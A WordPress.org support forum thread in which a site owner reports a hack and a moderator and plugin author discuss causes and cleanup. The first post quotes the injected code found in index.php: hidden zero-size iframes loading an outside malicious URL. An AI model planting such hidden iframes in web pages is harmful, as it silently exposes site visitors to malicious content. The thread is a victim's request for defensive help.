WordPress.org

Ready to get started?Download WordPress

Forums

BulletProof Security
[resolved] my site was hacked today (8 posts)

  1. portermonkey
    Member
    Posted 3 years ago #

    I found this code in my index.php and am wondering if BPS would have/could have/can possibly prevent this?

    <!-- ~ --><iframe src="http://videoonlinefree.co.cc/hck" width="0" height="0" frameborder="0"></iframe><!-- ~ --><!-- ~ --><iframe src="http://videoonlinefree.co.cc/hck" width="0" height="0" frameborder="0"></iframe><!-- ~ -->

  2. Samuel B
    moderator
    Posted 3 years ago #

    it works very well for most hacks
    it doesn't work if someone guesses/forces your passwords

  3. portermonkey
    Member
    Posted 3 years ago #

    thanks for replying!

    any idea how someone got that code into my index.php?

  4. Samuel B
    moderator
    Posted 3 years ago #

    it would only be a guess
    likely a weak password on a shared server opened every site on that server for sql injection or xss

  5. portermonkey
    Member
    Posted 3 years ago #

    So maybe not even necessarily my PW but a neighbor on Bluehost?

    I changed all my PW's and did all the suggestions in the Codex. And installed a few security plugims, so hopefully I have prevented this same thing from happening?

    thanks again for the input.

  6. AITpro
    Member
    Plugin Author

    Posted 3 years ago #

    As funny as this may sound I am somewhat excited and of course i feel your pain. When your site is hacked it is at minimum a very aggravating experience. I am sorry that you had to experience this.
    Which version of BPS did you have installed?
    Which Theme are you using. There are quite a few free Themes floating around that come "pre-hacked" the code that adds these links is already in the Theme. Ugh.
    Exploit Scanner is an excellent plugin to check for suspicious code in your Theme and website.
    Please send me your website URL via the AITpro contact form so that I can run some scans of your site. Thanks.
    Ed

  7. portermonkey
    Member
    Posted 3 years ago #

    Hey Ed, I am emailing you now from your site contact form.

    thanks

    oh yeah, I am glad you are excited!

  8. AITpro
    Member
    Plugin Author

    Posted 3 years ago #

    Whoops my bad. I read this comment wrong. I thought you already had BPS installed. ;) Phooey and Yeah!
    Regards,
    Ed

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic